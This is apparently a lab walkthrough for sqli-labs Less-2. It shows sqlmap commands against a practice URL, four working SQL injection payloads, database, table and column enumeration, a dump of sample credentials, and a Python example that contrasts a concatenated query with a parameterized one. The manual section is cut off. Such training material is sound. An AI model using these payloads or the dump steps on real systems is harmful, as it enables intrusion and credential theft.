Sqli-Labs-Less2_GET_Error Based_Integer_Based

Time: 2022-05-13 03:46:29

Challenge URL: http://web-labs.rinue.top/sqli-labs/Less-2

Method 1: SQLmap

sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch 
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 8793=8793

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 7770 FROM(SELECT COUNT(*),CONCAT(0x71767a6b71,(SELECT (ELT(7770=7770,1))),0x7178706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 6195 FROM (SELECT(SLEEP(5)))dCRn)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6064 UNION ALL SELECT NULL,NULL,CONCAT(0x71767a6b71,0x7668425342434b6e77446c74636950446778495a765543756c7a77524556537a78714a464d5a6a4b,0x7178706a71)-- RFsl
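All four findings above work because id reaches the query as an unquoted integer, so the payloads need no quote character to break out. The following is an added example, not code from the original post or from sqli-labs: it replays those payloads against a concatenated query and against a type-checked, parameterized one. It uses Python with in-memory SQLite standing in for the lab's PHP/MySQL; the query shape, the two-row table, the function names and the 'marker' literal are assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed two-row stand-in for the lab's users table (SQLite, not MySQL).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return db

# Payloads taken from the sqlmap output; the UNION one is adapted for SQLite by
# swapping the MySQL CONCAT(0x...) expression for a constructed 'marker' literal.
BOOL_TRUE = "1 AND 8793=8793"
BOOL_FALSE = "1 AND 8793=8794"   # constructed false twin of the payload above
UNION = "-6064 UNION ALL SELECT NULL,NULL,'marker'-- RFsl"

def lookup_vulnerable(db, raw_id):
    # Assumed query shape: the value is concatenated in an integer context, so
    # no quote is needed to break out and everything after the digits is SQL.
    sql = "SELECT id, username, password FROM users WHERE id=" + raw_id + " LIMIT 1"
    return db.execute(sql).fetchall()

def lookup_hardened(db, raw_id):
    # 1) Enforce the expected type; 2) bind the value instead of concatenating.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None  # rejected before any SQL is built
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return db.execute(sql, (int(raw_id),)).fetchall()

def compare():
    # Map each input to (vulnerable result, hardened result).
    db = make_db()
    return {p: (lookup_vulnerable(db, p), lookup_hardened(db, p))
            for p in ("1", BOOL_TRUE, BOOL_FALSE, UNION)}

if __name__ == "__main__":
    for payload, (vuln, hard) in compare().items():
        print(f"{payload!r}\n  vulnerable: {vuln}\n  hardened:   {hard}")
```

The differing results for the true and false conditions in the vulnerable function are the signal the boolean-based blind finding relies on; the hardened function returns the same rejection for every non-numeric input.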

Enumerate the databases

sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch --dbs
available databases [8]:                                                                 
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] Python
[*] security
[*] SQL5
[*] YaoGuang

Enumerate the tables in the database

sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch -D security --tables
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

Enumerate the columns in the table

sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch -D security -T users --columns
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

Dump the table contents

Database: security
Table: users
[13 entries]
+------------+----------+
| password   | username |
+------------+----------+
| Dumb       | Dumb     |
| I-kill-you | Angelina |
| [email protected]   | Dummy    |
| crappy     | secure   |
| stupidity  | stupid   |
| genious    | superman |
| mob!le     | batman   |
| admin      | admin    |
| admin1     | admin1   |
| admin2     | admin2   |
| admin3     | admin3   |
| dumbo      | dhakkan  |
| admin4     | admin4   |
+------------+----------+

Method 2: Manual injection

...